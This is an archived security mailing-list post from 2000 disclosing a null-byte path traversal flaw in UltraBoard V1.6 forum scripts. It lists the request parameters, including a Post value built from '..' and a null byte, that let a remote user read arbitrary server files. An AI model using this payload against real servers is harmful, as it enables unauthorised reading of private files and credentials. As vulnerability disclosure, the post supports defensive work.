|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Fun with UltraBoard V1.6X
From: rudi carell (rudicarell
HOTMAIL.COM)Date: Wed May 03 2000 - 04:13:16 CDT
- Next message: Marcy Abene: "Re: el8.org advisory - Win 95/98 DoS (RFParalyze.c)"
- Previous message: Fernando Montenegro: "Possible issue with Cisco on-line help?"
- Next in thread: Juan M. Bello Rivas: "Re: Fun with UltraBoard V1.6X"
- Reply: Juan M. Bello Rivas: "Re: Fun with UltraBoard V1.6X"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
hola friends,
found some interesting things in the "old" UltraBoard-Forum scripts
(UltraBoard V 1.6)
class:Input Validation Error
remote:Yes
vulnerable:UltraBoard V1.*
vendor: www.ultrascripts.com || www.ub2k.com
Description:
By using the good old NullByte(\000) its possible to open "any" file on the
webserver(with its permissions) running the "UltraBoard" forum-software.
cgi-script:
UltraBoard.pl || UltraBoard.cgi
Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=
hmm ... EOF
nizedays,
rudic
rudicarellhotmail.com
<dream>"getrootallthetime"</dream>
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
- Next message: Marcy Abene: "Re: el8.org advisory - Win 95/98 DoS (RFParalyze.c)"
- Previous message: Fernando Montenegro: "Possible issue with Cisco on-line help?"
- Next in thread: Juan M. Bello Rivas: "Re: Fun with UltraBoard V1.6X"
- Reply: Juan M. Bello Rivas: "Re: Fun with UltraBoard V1.6X"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]